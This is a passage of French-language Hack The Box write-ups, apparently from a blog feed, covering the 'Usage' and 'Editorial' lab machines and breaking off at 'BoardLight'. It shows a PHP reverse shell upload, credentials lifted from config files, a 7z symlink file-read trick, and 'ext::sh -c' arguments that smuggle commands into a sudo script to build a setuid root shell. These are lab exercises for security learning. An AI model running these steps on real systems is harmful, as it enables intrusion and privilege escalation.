intercepte la requete avec Burp et on modifie le nom du fichier en &ldquo;.php&rdquo;.</p> <p>Un bouton s&rsquo;affiche sur la page nous permettant de download le fichier image. En recuperant le lien, on trouve donc où est situé le fichier (et où est le dossiers avec les uploads) : <a class="link" href="http://admin.usage.htb/uploads/images/revshell.php" target="_blank" rel="noopener" >http://admin.usage.htb/uploads/images/revshell.php</a></p> <p>Il ne nous reste plus qu&rsquo;a ouvrir un netcat sur notre machine personelle et d&rsquo;ouvrir un shell sur la machine pour recuperer le flag utilisateur :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ nc -lvnp <span class="m">6789</span> </span></span><span class="line"><span class="cl">Listening on 0.0.0.0 <span class="m">6789</span> </span></span><span class="line"><span class="cl">Connection received on 10.10.11.18 <span class="m">35690</span> </span></span><span class="line"><span class="cl">Linux usage 5.15.0-101-generic <span class="c1">#111-Ubuntu SMP Tue Mar 5 20:16:58 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux</span> </span></span><span class="line"><span class="cl"> 23:32:32 up 1:54, <span class="m">0</span> users, load average: 2.39, 2.47, 2.58 </span></span><span class="line"><span class="cl">USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT </span></span><span class="line"><span class="cl"><span class="nv">uid</span><span class="o">=</span>1000<span class="o">(</span>dash<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>1000<span class="o">(</span>dash<span class="o">)</span> <span class="nv">groups</span><span class="o">=</span>1000<span class="o">(</span>dash<span class="o">)</span> </span></span><span class="line"><span class="cl">/bin/sh: 0: can<span class="s1">&#39;t access tty; job control turned off </span></span></span><span class="line"><span class="cl"><span class="s1">$ python3 -c &#39;</span>import pty<span class="p">;</span>pty.spawn<span class="o">(</span><span class="s2">&#34;/bin/bash&#34;</span><span class="o">)</span><span class="err">&#39;</span> </span></span><span class="line"><span class="cl">dash@usage:/$ <span class="nb">export</span> <span class="nv">TERM</span><span class="o">=</span>xterm </span></span><span class="line"><span class="cl"><span class="nb">export</span> <span class="nv">TERM</span><span class="o">=</span>xterm </span></span><span class="line"><span class="cl">dash@usage:/$ ^Z </span></span><span class="line"><span class="cl"><span class="o">[</span>1<span class="o">]</span> + <span class="m">21472</span> suspended nc -lvnp <span class="m">6789</span> </span></span><span class="line"><span class="cl">~/github/Hacking/HackTheBox/Machines/Usage <span class="o">(</span>main*<span class="o">)</span> » stty raw -echo<span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>1<span class="o">]</span> + <span class="m">21472</span> continued nc -lvnp <span class="m">6789</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">dash@usage:/$ whoami </span></span><span class="line"><span class="cl">dash </span></span><span class="line"><span class="cl">dash@usage:/$ ls </span></span><span class="line"><span class="cl">bin dev home lib32 libx32 media opt root sbin srv tmp var </span></span><span class="line"><span class="cl">boot etc lib lib64 lost+found mnt proc run snap sys usr </span></span><span class="line"><span class="cl">dash@usage:/$ <span class="nb">cd</span> </span></span><span class="line"><span class="cl">dash@usage:~$ ls </span></span><span class="line"><span class="cl">user.txt </span></span><span class="line"><span class="cl">dash@usage:~$ <span class="nb">pwd</span> </span></span><span class="line"><span class="cl">/home/dash </span></span><span class="line"><span class="cl">dash@usage:~$ cat user.txt </span></span><span class="line"><span class="cl">5313.....4bcc </span></span></code></pre></td></tr></table> </div> </div><p>Pour exploiter la faille, il fallait donc au minimum selectionner un fichier avec la bonne extension image (et le bon magic byte ? J&rsquo;avais mis GIF8 au début du fichier au cas où). Une fois passer cette étape, en appuyant sur submit et en modifiant la requete au vol, il n&rsquo;y a plus de vérification sur le fichier envoyé donc on peut changer en php il n&rsquo;y aura aucun probleme.</p> <h2 id="dash---xander">dash -&gt; xander </h2><h3 id="mmonit-service--user-password-">mmonit service : user password ? </h3><p>Le serveur utilise le service mmonit. On peut trouver un fichier .monitrc intéressant sur le serveur:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">cat .monitrc </span></span><span class="line"><span class="cl"><span class="c1">#Monitoring Interval in Seconds</span> </span></span><span class="line"><span class="cl"><span class="nb">set</span> daemon <span class="m">60</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">#Enable Web Access</span> </span></span><span class="line"><span class="cl"><span class="nb">set</span> httpd port <span class="m">2812</span> </span></span><span class="line"><span class="cl"> use address 127.0.0.1 </span></span><span class="line"><span class="cl"> allow admin:3nc0d3d_pa<span class="nv">$$</span>w0rd </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">#Apache</span> </span></span><span class="line"><span class="cl">check process apache with pidfile <span class="s2">&#34;/var/run/apache2/apache2.pid&#34;</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> cpu &gt; 80% <span class="k">for</span> <span class="m">2</span> cycles <span class="k">then</span> alert </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">#System Monitoring </span> </span></span><span class="line"><span class="cl">check system usage </span></span><span class="line"><span class="cl"> <span class="k">if</span> memory usage &gt; 80% <span class="k">for</span> <span class="m">2</span> cycles <span class="k">then</span> alert </span></span><span class="line"><span class="cl"> <span class="k">if</span> cpu usage <span class="o">(</span>user<span class="o">)</span> &gt; 70% <span class="k">for</span> <span class="m">2</span> cycles <span class="k">then</span> alert </span></span><span class="line"><span class="cl"> <span class="k">if</span> cpu usage <span class="o">(</span>system<span class="o">)</span> &gt; 30% <span class="k">then</span> alert </span></span><span class="line"><span class="cl"> <span class="k">if</span> cpu usage <span class="o">(</span><span class="nb">wait</span><span class="o">)</span> &gt; 20% <span class="k">then</span> alert </span></span><span class="line"><span class="cl"> <span class="k">if</span> loadavg <span class="o">(</span>1min<span class="o">)</span> &gt; <span class="m">6</span> <span class="k">for</span> <span class="m">2</span> cycles <span class="k">then</span> alert </span></span><span class="line"><span class="cl"> <span class="k">if</span> loadavg <span class="o">(</span>5min<span class="o">)</span> &gt; <span class="m">4</span> <span class="k">for</span> <span class="m">2</span> cycles <span class="k">then</span> alert </span></span><span class="line"><span class="cl"> <span class="k">if</span> swap usage &gt; 5% <span class="k">then</span> alert </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">check filesystem rootfs with path / </span></span><span class="line"><span class="cl"> <span class="k">if</span> space usage &gt; 80% <span class="k">then</span> alert </span></span></code></pre></td></tr></table> </div> </div><p>On trouve les creds: allow admin:3nc0d3d_pa$$w0rd</p> <h3 id="xander-user-pwned">Xander user pwned </h3><p>Le mdp est en fait celui de l&rsquo;utilisateur xander&hellip; Dans le /home on observe bien un dossier &ldquo;xander&rdquo; que je n&rsquo;avais pas vu dans un premier temps :</p> <blockquote> <p>xander : 3nc0d3d_pa$$w0rd</p> </blockquote> <h2 id="xander---root">xander -&gt; root </h2><h3 id="mysql-password">mysql password </h3><p>Dans le fichier .env du site web :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="nv">DB_CONNECTION</span><span class="o">=</span>mysql </span></span><span class="line"><span class="cl"><span class="nv">DB_HOST</span><span class="o">=</span>127.0.0.1 </span></span><span class="line"><span class="cl"><span class="nv">DB_PORT</span><span class="o">=</span><span class="m">3306</span> </span></span><span class="line"><span class="cl"><span class="nv">DB_DATABASE</span><span class="o">=</span>usage_blog </span></span><span class="line"><span class="cl"><span class="nv">DB_USERNAME</span><span class="o">=</span>staff </span></span><span class="line"><span class="cl"><span class="nv">DB_PASSWORD</span><span class="o">=</span>s3cr3t_c0d3d_1uth </span></span></code></pre></td></tr></table> </div> </div><h3 id="backup-script-as-root">Backup script as root </h3><p>Voir references pour comprendre l&rsquo;exploit. Mais en gros on peut faire sudo d&rsquo;une commande qui fait la backup du site web. Donc des fichiers dans /var/www/html. On peut créer un lien symbolique vers le fichier du flag /root/root.txt et grâce à une faille, avec un fichier @root.txt et à l&rsquo;execution de 7z, on peut recuperer l&rsquo;interieur du fichier. Voir references hacktricks.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">xander@usage:/var/www/html$ touch @root.txt </span></span><span class="line"><span class="cl">xander@usage:/var/www/html$ ln -s /root/root.txt root.txt </span></span><span class="line"><span class="cl">xander@usage:/var/www/html$ sudo /usr/bin/usage_management </span></span><span class="line"><span class="cl">Choose an option: </span></span><span class="line"><span class="cl">1. Project Backup </span></span><span class="line"><span class="cl">2. Backup MySQL data </span></span><span class="line"><span class="cl">3. Reset admin password </span></span><span class="line"><span class="cl">Enter your choice <span class="o">(</span>1/2/3<span class="o">)</span>: <span class="m">1</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">7-Zip <span class="o">(</span>a<span class="o">)</span> <span class="o">[</span>64<span class="o">]</span> 16.02 : Copyright <span class="o">(</span>c<span class="o">)</span> 1999-2016 Igor Pavlov : 2016-05-21 </span></span><span class="line"><span class="cl">p7zip Version 16.02 <span class="o">(</span><span class="nv">locale</span><span class="o">=</span>en_US.UTF-8,Utf16<span class="o">=</span>on,HugeFiles<span class="o">=</span>on,64 bits,2 CPUs AMD EPYC <span class="m">7513</span> 32-Core Processor <span class="o">(</span>A00F11<span class="o">)</span>,ASM,AES-NI<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Open archive: /var/backups/project.zip </span></span><span class="line"><span class="cl">-- </span></span><span class="line"><span class="cl"><span class="nv">Path</span> <span class="o">=</span> /var/backups/project.zip </span></span><span class="line"><span class="cl"><span class="nv">Type</span> <span class="o">=</span> zip </span></span><span class="line"><span class="cl">Physical <span class="nv">Size</span> <span class="o">=</span> <span class="m">54851331</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Scanning the drive: </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">WARNING: No more files </span></span><span class="line"><span class="cl">0e99.....4e1b </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="m">2984</span> folders, <span class="m">17981</span> files, <span class="m">114323032</span> bytes <span class="o">(</span><span class="m">110</span> MiB<span class="o">)</span> </span></span></code></pre></td></tr></table> </div> </div><h2 id="references">References </h2><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="nb">cd</span> /path/to/7z/acting/folder </span></span><span class="line"><span class="cl">touch @root.txt </span></span><span class="line"><span class="cl">ln -s /file/you/want/to/read root.txt </span></span></code></pre></td></tr></table> </div> </div><p>Then, when 7z is execute, it will treat root.txt as a file containing the list of files it should compress (thats what the existence of @root.txt indicates) and when it 7z read root.txt it will read /file/you/want/to/read and as the content of this file isn&rsquo;t a list of files, it will throw and error showing the content.</p> <p><a class="link" href="https://book.hacktricks.xyz/linux-hardening/privilege-escalation/wildcards-spare-tricks?source=post_page-----16397895490f--------------------------------" target="_blank" rel="noopener" >https://book.hacktricks.xyz/linux-hardening/privilege-escalation/wildcards-spare-tricks?source=post_page-----16397895490f--------------------------------</a></p>https://leopoldabgn.github.io/writeups/p/editorial-htb/Tue, 06 Aug 2024 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/editorial-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="Editorial cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Editorial</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Linux</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.11.20</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Easy</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="enumeration">Enumeration </h2><h3 id="nmap">nmap </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">Nmap scan report <span class="k">for</span> editorial.htb <span class="o">(</span>10.10.11.20<span class="o">)</span> </span></span><span class="line"><span class="cl">Host is up <span class="o">(</span>0.65s latency<span class="o">)</span>. </span></span><span class="line"><span class="cl">Not shown: <span class="m">997</span> closed ports </span></span><span class="line"><span class="cl">PORT STATE SERVICE </span></span><span class="line"><span class="cl">22/tcp open ssh </span></span><span class="line"><span class="cl">80/tcp open http </span></span><span class="line"><span class="cl">7002/tcp filtered afs3-prserver </span></span></code></pre></td></tr></table> </div> </div><h3 id="notes">Notes </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">submissions@tiempoarriba.htb </span></span><span class="line"><span class="cl">http://127.0.0.1:5000/api/latest/metadata/messages/authors </span></span></code></pre></td></tr></table> </div> </div><h2 id="foothold">Foothold </h2><h3 id="ssrf">SSRF </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">POST /upload-cover HTTP/1.1 </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">------WebKitFormBoundaryNBB1NG9hyA1AyOej </span></span><span class="line"><span class="cl">Content-Disposition: form-data<span class="p">;</span> <span class="nv">name</span><span class="o">=</span><span class="s2">&#34;bookurl&#34;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">http://127.0.0.1:5000/api/latest/metadata/messages/authors </span></span><span class="line"><span class="cl">------WebKitFormBoundaryNBB1NG9hyA1AyOej </span></span><span class="line"><span class="cl">Content-Disposition: form-data<span class="p">;</span> <span class="nv">name</span><span class="o">=</span><span class="s2">&#34;bookfile&#34;</span><span class="p">;</span> <span class="nv">filename</span><span class="o">=</span><span class="s2">&#34;2664593.png&#34;</span> </span></span><span class="line"><span class="cl">Content-Type: image/png </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">‰PNG </span></span><span class="line"><span class="cl">... </span></span></code></pre></td></tr></table> </div> </div><p>Dans la réponse de l&rsquo;api, on obtient les creds : user: dev password: dev080217_devAPI!@</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">HTTP/1.1 <span class="m">200</span> OK </span></span><span class="line"><span class="cl">Server: nginx/1.18.0 <span class="o">(</span>Ubuntu<span class="o">)</span> </span></span><span class="line"><span class="cl">Date: Sun, <span class="m">04</span> Aug <span class="m">2024</span> 23:44:11 GMT </span></span><span class="line"><span class="cl">Content-Type: application/octet-stream </span></span><span class="line"><span class="cl">Content-Length: <span class="m">506</span> </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl">Content-Disposition: inline<span class="p">;</span> <span class="nv">filename</span><span class="o">=</span>f84e3727-b58e-4a33-8cae-f439b5a6a997 </span></span><span class="line"><span class="cl">Last-Modified: Sun, <span class="m">04</span> Aug <span class="m">2024</span> 23:44:11 GMT </span></span><span class="line"><span class="cl">Cache-Control: no-cache </span></span><span class="line"><span class="cl">ETag: <span class="s2">&#34;1722815051.1237798-506-4116584587&#34;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">{</span><span class="s2">&#34;template_mail_message&#34;</span>:<span class="s2">&#34;Welcome to the team! We are thrilled to have you on board and can&#39;t wait to see the incredible content you&#39;ll bring to the table.\n\nYour login credentials for our internal forum and authors site are:\nUsername: dev\nPassword: dev080217_devAPI!@\nPlease be sure to change your password as soon as possible for security purposes.\n\nDon&#39;t hesitate to reach out if you have any questions or ideas - we&#39;re always here to support you.\n\nBest regards, Editorial Tiempo Arriba Team.&#34;</span><span class="o">}</span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="ssh-to-user-and-prod">SSH to user and prod </h3><p>On trouve repo git. En se deplacant dans les commits :</p> <p>En se connectant a user, on trouve un fichier python avec les creds d&rsquo;un autre utilisateur: user: prod pass: 080217_Producti0n_2023!@</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"> api_mail_new_authors<span class="o">()</span>: </span></span><span class="line"><span class="cl"> <span class="k">return</span> jsonify<span class="o">({</span> </span></span><span class="line"><span class="cl"> <span class="s1">&#39;template_mail_message&#39;</span>: <span class="s2">&#34;Welcome to the team! We are thrilled to have you on board and can&#39;t wait to see the incredible content you&#39;ll bring to the table.\n\nYour login credentials for our internal forum and authors site are:\nUsername: prod\nPassword: 080217_Producti0n_2023!@\nPlease be sure to change your password as soon as possible for security purposes.\n\nDon&#39;t hesitate to reach out if you have any questions or ideas - we&#39;re always here to support you.\n\nBest regards, &#34;</span> + api_editorial_name + <span class="s2">&#34; Team.&#34;</span> </span></span></code></pre></td></tr></table> </div> </div><h2 id="privilege-escalation">Privilege Escalation </h2><p>On utilise le compte prod.</p> <h3 id="enumeration-1">Enumeration </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">prod@editorial:~$ sudo -l </span></span><span class="line"><span class="cl">Matching Defaults entries <span class="k">for</span> prod on editorial: </span></span><span class="line"><span class="cl"> env_reset, mail_badpass, <span class="nv">secure_path</span><span class="o">=</span>/usr/local/sbin<span class="se">\:</span>/usr/local/bin<span class="se">\:</span>/usr/sbin<span class="se">\:</span>/usr/bin<span class="se">\:</span>/sbin<span class="se">\:</span>/bin<span class="se">\:</span>/snap/bin, use_pty </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">User prod may run the following commands on editorial: </span></span><span class="line"><span class="cl"> <span class="o">(</span>root<span class="o">)</span> /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py * </span></span></code></pre></td></tr></table> </div> </div><h3 id="clone_prod_changepy-as-root">clone_prod_change.py as root </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span><span class="lnt">9 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">cat exploit.c </span></span><span class="line"><span class="cl"><span class="c1">##include &lt;unistd.h&gt;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">int main<span class="o">()</span> <span class="o">{</span> </span></span><span class="line"><span class="cl"> setuid<span class="o">(</span>0<span class="o">)</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> setgid<span class="o">(</span>0<span class="o">)</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> system<span class="o">(</span><span class="s2">&#34;cat /root/root.txt&#34;</span><span class="o">)</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> 0<span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="o">}</span> </span></span></code></pre></td></tr></table> </div> </div><p>Ensuite, on compile le fichier en tant que root. Le fichier <code>exploit</code> est donc créer avec le owner <code>root</code>. Il suffit ensuite d&rsquo;executer un chmod +s, ce qui met le bit SUID à 1. Le bit SUID permet d&rsquo;executer un binaire comme ci on était le owner, même si on est pas connecté en tant que root. Lors de l&rsquo;execution du binaire, on effectue un cat et on obtient le flag root</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">prod@editorial:~$ sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py <span class="s2">&#34;ext::sh -c gcc% /home/prod/exploit.c% -o% /home/prod/exploit&#34;</span> </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">prod@editorial:~$ sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py <span class="s2">&#34;ext::sh -c chmod% +s% /home/prod/exploit&#34;</span> </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">prod@editorial:~$ ls -l </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">-rwsr-sr-x <span class="m">1</span> root root <span class="m">16048</span> Aug <span class="m">5</span> 22:47 exploit </span></span><span class="line"><span class="cl">-rw-rw-r-- <span class="m">1</span> prod prod <span class="m">114</span> Aug <span class="m">5</span> 22:45 exploit.c </span></span><span class="line"><span class="cl">prod@editorial:~$ ./exploit </span></span><span class="line"><span class="cl">7e05.....dea0 </span></span></code></pre></td></tr></table> </div> </div><h3 id="bonus">BONUS </h3><p>Permet d&rsquo;obtenir un shell. Aussi simple que l&rsquo;autre&hellip;</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1">#include &lt;unistd.h&gt;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">int main<span class="o">()</span> <span class="o">{</span> </span></span><span class="line"><span class="cl"> setuid<span class="o">(</span>0<span class="o">)</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> setgid<span class="o">(</span>0<span class="o">)</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> system<span class="o">(</span><span class="s2">&#34;/bin/bash&#34;</span><span class="o">)</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> 0<span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="o">}</span> </span></span></code></pre></td></tr></table> </div> </div><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1">## Commandes pour compiler et le chmod +s...</span> </span></span><span class="line"><span class="cl"><span class="c1">## ....</span> </span></span><span class="line"><span class="cl">prod@editorial:~$ ./exploit2 </span></span><span class="line"><span class="cl">root@editorial:~# whoami </span></span><span class="line"><span class="cl">root </span></span><span class="line"><span class="cl">root@editorial:~# <span class="nb">cd</span> /root </span></span><span class="line"><span class="cl">root@editorial:/root# ls </span></span><span class="line"><span class="cl">root.txt </span></span><span class="line"><span class="cl">root@editorial:/root# cat root.txt </span></span><span class="line"><span class="cl">7e05.....dea0 </span></span></code></pre></td></tr></table> </div> </div><h3 id="bonus-final">BONUS FINAL </h3><p>Il y avait beaucoup plus rapide&hellip; On fait un cat puis on met dans le /home de prod&hellip; Il reste plus qu&rsquo;a faire un cat du fichier&hellip;</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py <span class="s2">&#34;ext::sh -c cat% /root/root.txt% &gt;% /home/prod/hehe&#34;</span> </span></span><span class="line"><span class="cl">$ cat hehe </span></span><span class="line"><span class="cl">7e05.....dea0 </span></span></code></pre></td></tr></table> </div> </div>https://leopoldabgn.github.io/writeups/p/boardlight-htb/Sun, 04 Aug 2024 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/boardlight-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="BoardLight cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th 